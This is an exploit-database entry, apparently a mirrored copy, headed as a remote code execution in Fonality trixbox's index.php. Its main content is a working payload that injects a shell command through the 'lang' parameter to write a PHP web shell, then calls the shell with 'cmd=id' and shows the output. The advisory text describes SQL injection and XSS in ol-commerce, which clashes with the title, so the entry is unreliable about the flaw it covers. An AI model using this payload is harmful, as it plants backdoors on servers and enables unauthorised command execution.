Fonality trixbox – ‘index.php’ Remote Code Execution

  • 作者: AtT4CKxT3rR0r1ST
    日期: 2014-07-17
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39352/
  • source: https://www.securityfocus.com/bid/68719/info
    
    ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
    
    Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
    
    ol-commerce 2.1.1 is vulnerable; other versions may also be affected. 
    
    Http://www.example.com/maint/modules/home/index.php?lang=MF;echo "<?php
    system(\$_GET['cmd']);?> \$Greats 2 MY=\"Love:D">shell.php
    
    Your Shell
    
    Http://www.example.com/maint/modules/home/shell.php?cmd=id
    uid=100(asterisk) gid=101(asterisk) groups=101(asterisk) $Greats 2
    MY="Love:D